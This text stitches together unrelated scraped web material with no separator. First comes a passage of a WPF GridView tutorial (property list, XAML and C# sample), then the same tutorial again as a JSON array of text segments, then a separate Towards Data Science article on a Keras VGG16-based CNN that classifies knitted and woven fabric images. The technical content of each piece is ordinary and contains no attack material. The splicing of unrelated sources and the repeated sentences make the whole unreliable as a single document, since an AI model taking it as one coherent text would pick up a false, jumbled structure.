sets the index of the selected item. (Inherited from Selector) SelectedItem Gets or sets the selected item. (Inherited from Selector) SelectedItems Gets the currently selected items. (Inherited from ListViewBase) SelectedRanges Gets a collection of ItemIndexRange objects that describe the currently selected items in the list. (Inherited from ListViewBase) SelectedValue Gets or sets the value of the selected item, obtained by using the SelectedValuePath. (Inherited from Selector) Style Gets or sets an instance Style that is applied for this object during layout and rendering. (Inherited from FrameworkElement) VerticalAlignment Gets or sets the vertical alignment characteristics that are applied to a FrameworkElement when it is composed in a parent object such as a panel or items control. (Inherited from FrameworkElement) VerticalContentAlignment Gets or sets the vertical alignment of the control's content. 
(Inherited from Control) Width Gets or sets the width of a FrameworkElement. (Inherited from FrameworkElement) DataContextChanged Occurs when the value of the FrameworkElement.DataContext property changes. (Inherited from FrameworkElement) DragEnter Occurs when the input system reports an underlying drag event with this element as the target. (Inherited from UIElement) DragLeave Occurs when the input system reports an underlying drag event with this element as the origin. (Inherited from UIElement) DragOver Occurs when the input system reports an underlying drag event with this element as the potential drop target. (Inherited from UIElement) DragStarting Occurs when a drag operation is initiated. (Inherited from UIElement) Drop Occurs when the input system reports an underlying drop event with this element as the drop target. (Inherited from UIElement) ImageFailed Occurs when there is an error associated with image retrieval or format. ImageOpened Occurs when the image source is downloaded and decoded with no failure. You can use this event to determine the natural size of the image source. KeyDown Occurs when a keyboard key is pressed while the UIElement has focus. (Inherited from UIElement) KeyUp when a keyboard key is released while the UIElement has focus. (Inherited from UIElement) Arrange Positions child objects and determines a size for a UIElement. Parent objects that implement custom layout for their child elements should call this method from their layout override implementations to form a recursive layout update. (Inherited from UIElement) ClearValue Clears the local value of a dependency property. (Inherited from DependencyObject) FindName Retrieves an object that has the specified identifier name. (Inherited from FrameworkElement) GetValue Returns the current effective value of a dependency property from a DependencyObject. (Inherited from DependencyObject) ReadLocalValue Returns the local value of a dependency property, if a local value is set. (Inherited from DependencyObject) SetBinding Attaches a binding to a FrameworkElement, using the provided binding object. (Inherited from FrameworkElement) SetValue Sets the local value of a dependency property on a DependencyObject. (Inherited from DependencyObject) Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView. Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView. Drag a grid view control from the Toolbox. Drag a grid view control from the Toolbox. The following example shows the data in grid like table. The following example shows the data in grid like table. The following XAML code creates and implements a GridView. The following XAML code creates and implements a GridView. 
<Window x:Class = "WPFGridView.MainWindow" xmlns = "http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x = "http://schemas.microsoft.com/winfx/2006/xaml" Title = "MainWindow" Height = "350" Width = "525"> <Grid> <ListView HorizontalAlignment = "Left" Height = "299" Margin = "10,10,0,0" VerticalAlignment = "Top" Width = "497"Name = "MenList"> <ListView.View> <GridView> <GridViewColumn Header = "Name" DisplayMemberBinding = "{Binding Name}" Width = "100"/> <GridViewColumn Header = "ID" DisplayMemberBinding = "{Binding ID}" Width = "100"/> <GridViewColumn Header = "Age" DisplayMemberBinding = "{Binding Age}" Width = "100"/> </GridView> </ListView.View> </ListView> </Grid> </Window> Here is the C# implementation in which person class is implemented. using System; using System.Windows; using System.Windows.Controls; namespace WPFGridView { /// <summary> /// Interaction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { public MainWindow() { InitializeComponent(); MenList.Items.Add(new Person() {Name = "Ali", ID = "123A", Age = 20 }); MenList.Items.Add(new Person() {Name = "Akram",ID= "456X", Age = 35 }); MenList.Items.Add(new Person() {Name = "Salman",ID="333E", Age = 49 }); } } class Person { public string Name { get; set; } public string ID { get; set; } public int Age { get; set; } } } When you compile and execute the above code, it will produce the following output. We recommend that you execute the above example code and try the other properties and events of GridView. 31 Lectures 2.5 hours Anadi Sharma 30 Lectures 2.5 hours Taurius Litvinavicius Print Add Notes Bookmark this page
[ { "code": null, "e": 2224, "s": 2020, "text": "A GridView is a control that displays data items in rows and columns. Actually a ListView displays data. By default, it contains a GridView. The hierarchical inheritance of GridView class is as follows −" }, { "code": null, "e": 2235, "s": 2224, "text": "Background" }, { "code": null, "e": 2326, "s": 2235, "text": "Gets or sets a brush that provides the background of the control. (Inherited from Control)" }, { "code": null, "e": 2342, "s": 2326, "text": "BorderThickness" }, { "code": null, "e": 2415, "s": 2342, "text": "Gets or sets the border thickness of a control. (Inherited from Control)" }, { "code": null, "e": 2427, "s": 2415, "text": "DataContext" }, { "code": null, "e": 2552, "s": 2427, "text": "Gets or sets the data context for a FrameworkElement when it participates in data binding. (Inherited from FrameworkElement)" }, { "code": null, "e": 2563, "s": 2552, "text": "FontFamily" }, { "code": null, "e": 2647, "s": 2563, "text": "Gets or sets the font used to display text in the control. (Inherited from Control)" }, { "code": null, "e": 2656, "s": 2647, "text": "FontSize" }, { "code": null, "e": 2732, "s": 2656, "text": "Gets or sets the size of the text in this control. (Inherited from Control)" }, { "code": null, "e": 2742, "s": 2732, "text": "FontStyle" }, { "code": null, "e": 2821, "s": 2742, "text": "Gets or sets the style in which the text is rendered. (Inherited from Control)" }, { "code": null, "e": 2832, "s": 2821, "text": "FontWeight" }, { "code": null, "e": 2907, "s": 2832, "text": "Gets or sets the thickness of the specified font. (Inherited from Control)" }, { "code": null, "e": 2918, "s": 2907, "text": "Foreground" }, { "code": null, "e": 3001, "s": 2918, "text": "Gets or sets a brush that describes the foreground color. (Inherited from Control)" }, { "code": null, "e": 3012, "s": 3001, "text": "GroupStyle" }, { "code": null, "e": 3134, "s": 3012, "text": "Gets a collection of GroupStyle objects that define the appearance of each level of groups. (Inherited from ItemsControl)" }, { "code": null, "e": 3141, "s": 3134, "text": "Header" }, { "code": null, "e": 3217, "s": 3141, "text": "Gets or sets the content for the list header. (Inherited from ListViewBase)" }, { "code": null, "e": 3224, "s": 3217, "text": "Height" }, { "code": null, "e": 3315, "s": 3224, "text": "Gets or sets the suggested height of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 3335, "s": 3315, "text": "HorizontalAlignment" }, { "code": null, "e": 3536, "s": 3335, "text": "Gets or sets the horizontal alignment characteristics that are applied to a FrameworkElement when it is composed in a layout parent, such as a panel or items control. (Inherited from FrameworkElement)" }, { "code": null, "e": 3563, "s": 3536, "text": "HorizontalContentAlignment" }, { "code": null, "e": 3652, "s": 3563, "text": "Gets or sets the horizontal alignment of the control's content. (Inherited from Control)" }, { "code": null, "e": 3658, "s": 3652, "text": "Items" }, { "code": null, "e": 3753, "s": 3658, "text": "Gets the collection used to generate the content of the control. (Inherited from ItemsControl)" }, { "code": null, "e": 3765, "s": 3753, "text": "ItemsSource" }, { "code": null, "e": 3875, "s": 3765, "text": "Gets or sets an object source used to generate the content of the ItemsControl. 
(Inherited from ItemsControl)" }, { "code": null, "e": 3888, "s": 3875, "text": "ItemTemplate" }, { "code": null, "e": 3975, "s": 3888, "text": "Gets or sets the DataTemplate used to display each item. (Inherited from ItemsControl)" }, { "code": null, "e": 3982, "s": 3975, "text": "Margin" }, { "code": null, "e": 4069, "s": 3982, "text": "Gets or sets the outer margin of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 4074, "s": 4069, "text": "Name" }, { "code": null, "e": 4287, "s": 4074, "text": "Gets or sets the identifying name of the object. When a XAML processor creates the object tree from XAML markup, run-time code can refer to the XAML-declared object by this name. (Inherited from FrameworkElement)" }, { "code": null, "e": 4295, "s": 4287, "text": "Opacity" }, { "code": null, "e": 4371, "s": 4295, "text": "Gets or sets the degree of the object's opacity. (Inherited from UIElement)" }, { "code": null, "e": 4381, "s": 4371, "text": "Resources" }, { "code": null, "e": 4619, "s": 4381, "text": "Gets the locally defined resource dictionary. In XAML, you can establish resource items as child object elements of a frameworkElement.Resources property element, through XAML implicit collection syntax. (Inherited from FrameworkElement)" }, { "code": null, "e": 4633, "s": 4619, "text": "SelectedIndex" }, { "code": null, "e": 4704, "s": 4633, "text": "Gets or sets the index of the selected item. (Inherited from Selector)" }, { "code": null, "e": 4717, "s": 4704, "text": "SelectedItem" }, { "code": null, "e": 4775, "s": 4717, "text": "Gets or sets the selected item. (Inherited from Selector)" }, { "code": null, "e": 4789, "s": 4775, "text": "SelectedItems" }, { "code": null, "e": 4854, "s": 4789, "text": "Gets the currently selected items. (Inherited from ListViewBase)" }, { "code": null, "e": 4869, "s": 4854, "text": "SelectedRanges" }, { "code": null, "e": 4999, "s": 4869, "text": "Gets a collection of ItemIndexRange objects that describe the currently selected items in the list. (Inherited from ListViewBase)" }, { "code": null, "e": 5013, "s": 4999, "text": "SelectedValue" }, { "code": null, "e": 5125, "s": 5013, "text": "Gets or sets the value of the selected item, obtained by using the SelectedValuePath. (Inherited from Selector)" }, { "code": null, "e": 5131, "s": 5125, "text": "Style" }, { "code": null, "e": 5257, "s": 5131, "text": "Gets or sets an instance Style that is applied for this object during layout and rendering. (Inherited from FrameworkElement)" }, { "code": null, "e": 5275, "s": 5257, "text": "VerticalAlignment" }, { "code": null, "e": 5473, "s": 5275, "text": "Gets or sets the vertical alignment characteristics that are applied to a FrameworkElement when it is composed in a parent object such as a panel or items control. (Inherited from FrameworkElement)" }, { "code": null, "e": 5498, "s": 5473, "text": "VerticalContentAlignment" }, { "code": null, "e": 5585, "s": 5498, "text": "Gets or sets the vertical alignment of the control's content. (Inherited from Control)" }, { "code": null, "e": 5591, "s": 5585, "text": "Width" }, { "code": null, "e": 5671, "s": 5591, "text": "Gets or sets the width of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 5690, "s": 5671, "text": "DataContextChanged" }, { "code": null, "e": 5800, "s": 5690, "text": "Occurs when the value of the FrameworkElement.DataContext property changes. 
(Inherited from FrameworkElement)" }, { "code": null, "e": 5810, "s": 5800, "text": "DragEnter" }, { "code": null, "e": 5932, "s": 5810, "text": "Occurs when the input system reports an underlying drag event with this element as the target. (Inherited from UIElement)" }, { "code": null, "e": 5942, "s": 5932, "text": "DragLeave" }, { "code": null, "e": 6064, "s": 5942, "text": "Occurs when the input system reports an underlying drag event with this element as the origin. (Inherited from UIElement)" }, { "code": null, "e": 6073, "s": 6064, "text": "DragOver" }, { "code": null, "e": 6210, "s": 6073, "text": "Occurs when the input system reports an underlying drag event with this element as the potential drop target. (Inherited from UIElement)" }, { "code": null, "e": 6223, "s": 6210, "text": "DragStarting" }, { "code": null, "e": 6293, "s": 6223, "text": "Occurs when a drag operation is initiated. (Inherited from UIElement)" }, { "code": null, "e": 6298, "s": 6293, "text": "Drop" }, { "code": null, "e": 6425, "s": 6298, "text": "Occurs when the input system reports an underlying drop event with this element as the drop target. (Inherited from UIElement)" }, { "code": null, "e": 6437, "s": 6425, "text": "ImageFailed" }, { "code": null, "e": 6510, "s": 6437, "text": "Occurs when there is an error associated with image retrieval or format." }, { "code": null, "e": 6522, "s": 6510, "text": "ImageOpened" }, { "code": null, "e": 6668, "s": 6522, "text": "Occurs when the image source is downloaded and decoded with no failure. You can use this event to determine the natural size of the image source." }, { "code": null, "e": 6676, "s": 6668, "text": "KeyDown" }, { "code": null, "e": 6772, "s": 6676, "text": "Occurs when a keyboard key is pressed while the UIElement has focus. (Inherited from UIElement)" }, { "code": null, "e": 6778, "s": 6772, "text": "KeyUp" }, { "code": null, "e": 6868, "s": 6778, "text": "when a keyboard key is released while the UIElement has focus. (Inherited from UIElement)" }, { "code": null, "e": 6876, "s": 6868, "text": "Arrange" }, { "code": null, "e": 7137, "s": 6876, "text": "Positions child objects and determines a size for a UIElement. Parent objects that implement custom layout for their child elements should call this method from their layout override implementations to form a recursive layout update. (Inherited from UIElement)" }, { "code": null, "e": 7148, "s": 7137, "text": "ClearValue" }, { "code": null, "e": 7231, "s": 7148, "text": "Clears the local value of a dependency property. (Inherited from DependencyObject)" }, { "code": null, "e": 7240, "s": 7231, "text": "FindName" }, { "code": null, "e": 7334, "s": 7240, "text": "Retrieves an object that has the specified identifier name. (Inherited from FrameworkElement)" }, { "code": null, "e": 7343, "s": 7334, "text": "GetValue" }, { "code": null, "e": 7463, "s": 7343, "text": "Returns the current effective value of a dependency property from a DependencyObject. (Inherited from DependencyObject)" }, { "code": null, "e": 7478, "s": 7463, "text": "ReadLocalValue" }, { "code": null, "e": 7587, "s": 7478, "text": "Returns the local value of a dependency property, if a local value is set. (Inherited from DependencyObject)" }, { "code": null, "e": 7598, "s": 7587, "text": "SetBinding" }, { "code": null, "e": 7709, "s": 7598, "text": "Attaches a binding to a FrameworkElement, using the provided binding object. 
(Inherited from FrameworkElement)" }, { "code": null, "e": 7718, "s": 7709, "text": "SetValue" }, { "code": null, "e": 7821, "s": 7718, "text": "Sets the local value of a dependency property on a DependencyObject. (Inherited from DependencyObject)" }, { "code": null, "e": 7940, "s": 7821, "text": "Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView." }, { "code": null, "e": 8059, "s": 7940, "text": "Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView." }, { "code": null, "e": 8102, "s": 8059, "text": "Drag a grid view control from the Toolbox." }, { "code": null, "e": 8145, "s": 8102, "text": "Drag a grid view control from the Toolbox." }, { "code": null, "e": 8202, "s": 8145, "text": "The following example shows the data in grid like table." }, { "code": null, "e": 8259, "s": 8202, "text": "The following example shows the data in grid like table." }, { "code": null, "e": 8318, "s": 8259, "text": "The following XAML code creates and implements a GridView." }, { "code": null, "e": 8377, "s": 8318, "text": "The following XAML code creates and implements a GridView." }, { "code": null, "e": 9302, "s": 8377, "text": "<Window x:Class = \"WPFGridView.MainWindow\" \n xmlns = \"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \n xmlns:x = \"http://schemas.microsoft.com/winfx/2006/xaml\" \n Title = \"MainWindow\" Height = \"350\" Width = \"525\">\n\t\n <Grid> \n <ListView HorizontalAlignment = \"Left\" Height = \"299\" Margin = \"10,10,0,0\" \n VerticalAlignment = \"Top\" Width = \"497\"Name = \"MenList\">\n\t\t\t\n <ListView.View>\n <GridView> \n <GridViewColumn Header = \"Name\" DisplayMemberBinding = \"{Binding Name}\" \n Width = \"100\"/> \n\t\t\t\t\t\t\n <GridViewColumn Header = \"ID\" DisplayMemberBinding = \"{Binding ID}\" \n Width = \"100\"/>\n\t\t\t\t\t\t\n <GridViewColumn Header = \"Age\" DisplayMemberBinding = \"{Binding Age}\" \n Width = \"100\"/>\n\t\t\t\t\t\t\n </GridView> \n </ListView.View>\n\t\t\t\n </ListView> \n </Grid> \n\t\n</Window>" }, { "code": null, "e": 9370, "s": 9302, "text": "Here is the C# implementation in which person class is implemented." }, { "code": null, "e": 10075, "s": 9370, "text": "using System; \nusing System.Windows; \nusing System.Windows.Controls;\n \nnamespace WPFGridView { \n /// <summary> \n /// Interaction logic for MainWindow.xaml \n /// </summary> \n\t\n public partial class MainWindow : Window { \n\t\n public MainWindow() { \n InitializeComponent(); \n\t\t\t\n MenList.Items.Add(new Person() {Name = \"Ali\", ID = \"123A\", Age = 20 }); \n MenList.Items.Add(new Person() {Name = \"Akram\",ID= \"456X\", Age = 35 }); \n MenList.Items.Add(new Person() {Name = \"Salman\",ID=\"333E\", Age = 49 }); \n } \n }\n\t\n class Person { \n public string Name { get; set; } \n public string ID { get; set; } \n public int Age { get; set; } \n } \n\t\n}" }, { "code": null, "e": 10158, "s": 10075, "text": "When you compile and execute the above code, it will produce the following output." }, { "code": null, "e": 10264, "s": 10158, "text": "We recommend that you execute the above example code and try the other properties and events of GridView." 
}, { "code": null, "e": 10299, "s": 10264, "text": "\n 31 Lectures \n 2.5 hours \n" }, { "code": null, "e": 10313, "s": 10299, "text": " Anadi Sharma" }, { "code": null, "e": 10348, "s": 10313, "text": "\n 30 Lectures \n 2.5 hours \n" }, { "code": null, "e": 10371, "s": 10348, "text": " Taurius Litvinavicius" }, { "code": null, "e": 10378, "s": 10371, "text": " Print" }, { "code": null, "e": 10389, "s": 10378, "text": " Add Notes" } ]
AI for Textiles — Convolutional Neural Network Based Fabric Structure Classifier | by Yasith Sanura Perera | Towards Data Science
Today, deep learning is used in a wide variety of artificial intelligence applications, including facial recognition and natural language processing. A number of applications of deep learning can be found in the field of textile engineering as well, and computer vision has been widely used in this context. This article describes the approach used in developing a convolutional neural network for identifying fabric structures from input images of fabric surfaces. The developed model is capable of successfully distinguishing between knitted and woven fabric structures.

Knitted and woven structures can easily be distinguished due to their structural differences: the loop structure of knitted fabrics and the interlacing warp and weft yarns of woven fabrics allow easy identification of the two structures. If a neural network can be trained to learn these features, which are inherent to the fabric structures, by showing it a set of labelled knitted and woven fabric images, then the network should be able to correctly classify fabric images that it has never seen before. To implement this, a convolutional neural network (CNN) architecture was chosen, as CNNs are capable of effectively extracting features from images.

The model was developed in Python with the TensorFlow framework and the Keras API. To obtain a dataset for training the neural network, an open-source database of images available at https://ibug.doc.ic.ac.uk/resources/fabrics/ was used, originally prepared for a research project (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016). The fabric images in this original data set were labelled according to the type of material (i.e. nylon, polyester, cotton, etc.). Therefore, before training, a total of 4300 images were selected from this original data set and manually labelled according to the fabric structure (i.e. knitted or woven). Out of the 4300 images, 4200 were used as training data, while the remaining 100 were used as validation data. (Even though this makes the validation set small, the majority of the images were kept for training to avoid overfitting.) Both the training and validation data sets consisted of an equal number of knitted and woven fabric images.

Initially, a transfer learning approach was used: the VGG16 architecture (https://arxiv.org/abs/1409.1556) was loaded with pre-trained weights, and only the final output layer was replaced by a softmax layer with two units. Using transfer learning, this final output layer was trained while the weights of the other layers were kept frozen; after 100 epochs, the training and validation accuracy reached 88% and 83% respectively.

To improve the model, the final three dense layers of the original VGG16 architecture were removed and replaced by a couple of slightly modified dense layers. Using transfer learning, these newly added layers were trained while the weights of the remaining layers were kept frozen. The model reached a maximum training accuracy of 99.81% and a validation accuracy of 91%. The model was now clearly overfitting to the training data.

To overcome the overfitting problem, the final dense layers of the model were trained again with a dropout layer added between the last two dense layers, along with data augmentation.
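Before looking at the results of that run, the sketch below illustrates the basic transfer-learning setup described above: VGG16 loaded with pre-trained ImageNet weights, all layers frozen except a new two-unit softmax head. This is an illustrative reconstruction rather than the author's exact code, and the optimizer settings are assumptions.

# Minimal sketch of the transfer-learning setup (illustrative; not the original code)
from keras.applications import VGG16
from keras.layers import Dense
from keras.models import Model
from keras.optimizers import Adam

# Load VGG16 with its ImageNet weights, including the fully connected top
base = VGG16(weights='imagenet', include_top=True)

# Attach a new 2-class softmax head to the last hidden fully connected layer (fc2)
x = base.layers[-2].output
output = Dense(2, activation='softmax', name='fabric_head')(x)
model = Model(inputs=base.input, outputs=output)

# Freeze every pre-trained layer so that only the new head is trained
for layer in model.layers[:-1]:
    layer.trainable = False

model.compile(optimizer=Adam(lr=0.0001),
              loss='binary_crossentropy',
              metrics=['accuracy'])

The training and validation generators shown later in the article can then be passed to model.fit_generator() to train only this new output layer.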
However, after 20 epochs the model reached a training accuracy of 84.55% and a validation accuracy of 84%, and did not seem to be improving further. The overfitting problem was overcome, but the model now had high bias.

Finally, it was decided to train the entire model instead of using transfer learning. However, since the amount of training data available was limited, the complexity of the original VGG16 architecture was reduced: the fifth convolutional block was removed and an average pooling layer was added, followed by the two dense layers. To avoid overfitting, data augmentation was used with several techniques such as rotation, vertical flipping, zooming and different brightness levels (https://keras.io/api/preprocessing/image/). Rotating the input images is important, as it allows the model to identify the wales of knitted fabrics and the warp and weft yarns of woven fabrics that are oriented in different directions due to variations in how the images are captured. Zooming in on the images allows the model to clearly identify the loop structure of knitted fabrics and the interlacing pattern of woven fabrics.

import numpy as np
import keras
from keras.layers import AveragePooling2D
from keras.layers.core import Dense, Flatten
from keras.optimizers import Adam
from keras.metrics import binary_crossentropy
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model
from keras.applications import imagenet_utils
from keras.callbacks import ModelCheckpoint

train_data_path = '/content/drive/My Drive/fabric_data/Train'
test_data_path = '/content/drive/My Drive/fabric_data/Test'

# Training images are augmented (rotation, flips, brightness, zoom); both sets are rescaled to [0, 1]
train_data = ImageDataGenerator(rescale=1.0/255, rotation_range=180, vertical_flip=True,
                                horizontal_flip=True, brightness_range=[0.5, 1.5], zoom_range=[1, 1.5])
train_generator = train_data.flow_from_directory(directory=train_data_path, target_size=(224, 224),
                                                 classes=['Woven', 'Knitted'], batch_size=70, shuffle=True)
test_data = ImageDataGenerator(rescale=1.0/255)
test_generator = test_data.flow_from_directory(directory=test_data_path, target_size=(224, 224),
                                               classes=['Woven', 'Knitted'], batch_size=50, shuffle=False)

# Build a reduced VGG16: drop the fifth convolutional block, then add average pooling and two dense layers
vgg16_model = keras.applications.VGG16()
x = vgg16_model.layers[-9].output          # block4_pool output; the fifth convolutional block is dropped
x = AveragePooling2D(pool_size=(2, 2))(x)
x = Flatten(name="flatten")(x)
x = Dense(128, activation='relu')(x)
x = Dense(2, activation='softmax')(x)      # two classes: Woven, Knitted
model = Model(inputs=vgg16_model.input, outputs=x)

model.compile(optimizer=Adam(lr=0.00001, clipvalue=0.5, clipnorm=1),
              loss='binary_crossentropy', metrics=['accuracy'])

print("\nTraining.....")
# Save the weights that give the best validation accuracy
checkpoint = ModelCheckpoint(filepath='/content/drive/My Drive/new_fab_model.h5',
                             monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')
history = model.fit_generator(generator=train_generator, steps_per_epoch=60,
                              validation_data=test_generator, validation_steps=2,
                              epochs=250, verbose=1, callbacks=[checkpoint])

The entire model was trained from scratch using the Adam optimizer at a learning rate of 0.00001. After 50 epochs of training, the model achieved a training accuracy of 98% and a validation accuracy of 97%.

Since the validation data set was too small (only 100 images), a different set of 100 fabric images was tested with the trained model to further validate its performance in the real world. The model predicted 97 of those images correctly.
The significance of this new test sample is that the images were taken from a completely different distribution than the original training and validation data. One set of images was downloaded from the internet (3D knitted fabric images). The other set was scanned with a scanner, and the images were zoomed in by 50%, cropped and resized to 224x224 pixels before being fed to the neural network. The fabric images of the original training and validation data sets had been captured using a photometric stereo sensor (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016).

It should be noted that the training data for the model consisted of weft knitted fabrics only. Only technical front images of single jersey knitted structures were available, and no 3D knitted structures were included. However, the trained model was capable of correctly predicting 3D cable knitted structures, and it also correctly predicted some of the single jersey technical back images. Most of the woven fabric images in the training set consisted of plain and twill structures.

Intermediate activations of the trained model were visualized to understand how the convolutions learn features from the fabric images. A knitted fabric image was fed to the model as the input and the corresponding layer activations were inspected; only some of the convolutions of a few layers were examined (a short sketch of how such activations can be extracted is given at the end of this article).

The initial layers of the model seem to identify the most basic features of the image, such as horizontal and vertical edges. Some of the convolutions identified the edges of the wales on the knitted fabric surface. In the middle layers, the convolutions begin to extract much finer details, such as the shape of the knitted loops, and the max pooling layers highlight these features. The activations of the deepest layers are difficult to interpret visually, as they encode information specific to the fabric structure, according to what the model has learned during training.

It should be noted that this model was developed for academic purposes only, and it can distinguish between the two main fabric structures (knitted and woven) only. Distinguishing between several fabric structure variations, such as single jersey, rib and interlock, would be a more interesting task, but due to the unavailability of a large data set covering such different structures, the model was limited to distinguishing between knitted and woven fabrics. With sufficient data, however, a model can be trained for such a task as well. It should further be noted that it may be possible to improve this model by using a different neural network architecture and more data.
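As a companion to the activation visualization described above, the following sketch shows one common way to pull intermediate activations out of a trained Keras model. It is an illustrative reconstruction, not the author's code; the model file name, the image path and the choice of layers are assumptions.

# Minimal sketch: extracting intermediate activations (file names and layer range are illustrative)
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model, Model
from keras.preprocessing.image import load_img, img_to_array

model = load_model('new_fab_model.h5')               # previously trained fabric classifier

# Build a helper model that returns the outputs of the first few layers
layer_outputs = [layer.output for layer in model.layers[1:9]]
activation_model = Model(inputs=model.input, outputs=layer_outputs)

# Prepare a single fabric image the same way as during training
img = load_img('knitted_sample.jpg', target_size=(224, 224))
x = np.expand_dims(img_to_array(img) / 255.0, axis=0)

# Each element of 'activations' has shape (1, height, width, channels)
activations = activation_model.predict(x)
for layer, act in zip(model.layers[1:9], activations):
    print(layer.name, act.shape)

# Display one channel of the first layer's activation as an example
plt.imshow(activations[0][0, :, :, 0], cmap='viridis')
plt.show()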
[ { "code": null, "e": 761, "s": 172, "text": "Today, deep learning is used in a wide variety of artificial intelligence applications including facial recognition, natural language processing and so on. It is possible to find a number of applications of deep learning in the field of textile engineering as well, and computer vision has widely been used in this context. This article describes the approach used in developing a convolutional neural network for identifying fabric structures from input images of fabric surfaces. The developed model is capable of successfully distinguishing between knitted and woven fabric structures." }, { "code": null, "e": 1473, "s": 761, "text": "Knitted and woven structures can easily be distinguished due to their structural differences. The loop structure of knitted fabrics and the interlacing warp and weft yarns on woven fabrics allow the easy identification of the two structures. If a neural network can be trained to learn these features that are inherent to the fabric structures, by showing a set of labelled knitted and woven fabric images, then the neural network would be able to correctly distinguish between knitted and woven fabric images, that it has never seen before. In order to implement this, a convolutional neural network (CNN) architecture was decided to be used, as CNNs are capable of effectively extracting features from images." }, { "code": null, "e": 2600, "s": 1473, "text": "The model was developed using python with the TensorFlow framework and Keras API. To obtain a dataset for training the neural network, an open source database of images available on, https://ibug.doc.ic.ac.uk/resources/fabrics/ was used, which was originally prepared for a research (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016). The fabric images in this original data set were labelled according to the type of material (i.e. nylon, polyester, cotton, etc.). Therefore, before training, a total of 4300 images were selected from this original data set and manually labelled them according to the fabric structure (i.e. Knitted and Woven). Out of the 4300 images, 4200 were used as training data, while the remaining 100 were used as validation data. (Even though the validation data set was too small, majority of the images were used for training to avoid overfitting). Both the training and validation data sets consisted of an equal number of knitted and woven fabric images." }, { "code": null, "e": 3050, "s": 2600, "text": "Initially, the transfer learning technique was decided to be used. Therefore, the VGG16 architecture (https://arxiv.org/abs/1409.1556) was used with pre-trained weights. Only the final output layer was changed to be a softmax layer with two units. Using transfer learning, the final output layer was trained, keeping the weights of the other layers frozen, and after 100 epochs, the training and validation accuracy reached 88% and 83% respectively." }, { "code": null, "e": 3481, "s": 3050, "text": "To improve the model, the final three dense layers of the original VGG16 architecture were removed, and replaced by a couple of slightly modified dense layers. Using transfer learning, these newly added layers were trained while keeping the weights of the remaining layers frozen. The model reached a maximum training accuracy of 99.81% and a validation accuracy of 91%. 
The model was now clearly overfitting to the training data." }, { "code": null, "e": 3891, "s": 3481, "text": "To overcome the overfitting problem, again the final dense layers of the model were trained with a dropout layer added between the last two dense layers, along with data augmentation. However, after 20 epochs, the model reached a training accuracy of 84.55% and a validation accuracy of 84% and didn’t seem to be further improving. The overfitting problem was overcome, but now the model was having high bias." }, { "code": null, "e": 4895, "s": 3891, "text": "Finally, it was decided to train the entire model, instead of using transfer learning. However, since the amount of training data available was limited, it was decided to reduce the complexity of the original VGG16 architecture. Hence, the fifth convolutional block of the original VGG16 architecture was removed and an average pooling layer was added, followed by the two dense layers. To avoid overfitting, data augmentation was used with several augmentation techniques such as rotating, vertical flipping, zooming and different brightness levels (https://keras.io/api/preprocessing/image/). Rotation of the input images is important as it allows the model to identify the wales of knitted fabric images and warp and weft yarns in woven fabric images, that are oriented in different directions, due to the variations that occur when capturing the images. Zooming in on the images allows the model to clearly identify the loop structure of knitted fabrics and the interlacing pattern of woven fabrics." }, { "code": null, "e": 7071, "s": 4895, "text": "import numpy as np;import keras;from keras.layers import AveragePooling2D;from keras. layers.core import Dense, Flatten;from keras.optimizers import Adam;from keras.metrics import binary_crossentropy;from keras.preprocessing.image import ImageDataGenerator;from keras.models import Model;from keras.applications import imagenet_utils;from keras.callbacks import ModelCheckpoint;train_data_path = '/content/drive/My Drive/fabric_data/Train';test_data_path = '/content/drive/My Drive/fabric_data/Test';train_data = ImageDataGenerator(rescale = 1.0/255, rotation_range = 180, vertical_flip = True, horizontal_flip = True, brightness_range = [0.5, 1.5], zoom_range = [1, 1.5]);train_generator = train_data.flow_from_directory(directory = train_data_path, target_size = (224,224), classes = ['Woven','Knitted'], batch_size = 70, shuffle = True);test_data = ImageDataGenerator(rescale = 1.0/255);test_generator = test_data.flow_from_directory(directory = test_data_path, target_size = (224,224), classes = ['Woven', 'Knitted'], batch_size = 50, shuffle = False);vgg16_model = keras.applications.VGG16();x = vgg16_model.layers[-9].output;x = AveragePooling2D(pool_size = (2,2))(x);x = Flatten(name=\"flatten\")(x);x = Dense(128, activation = 'relu')(x);x = Dense(2, activation = 'softmax')(x);model = Model(inputs = vgg16_model.input, outputs = x);model.compile(optimizer = Adam(lr=0.00001, clipvalue = 0.5, clipnorm = 1), loss = 'binary_crossentropy', metrics = ['accuracy']);print(\"\\nTraining.....\");checkpoint = ModelCheckpoint(filepath = '/content/drive/My Drive/new_fab_model.h5', monitor='val_accuracy', verbose=1, save_best_only=True, mode='max');history = model.fit_generator(generator = train_generator, steps_per_epoch = 60, validation_data = test_generator, validation_steps = 2, epochs = 250, verbose = 1, callbacks = [checkpoint]);" }, { "code": null, "e": 7280, "s": 7071, "text": "The entire model was trained from 
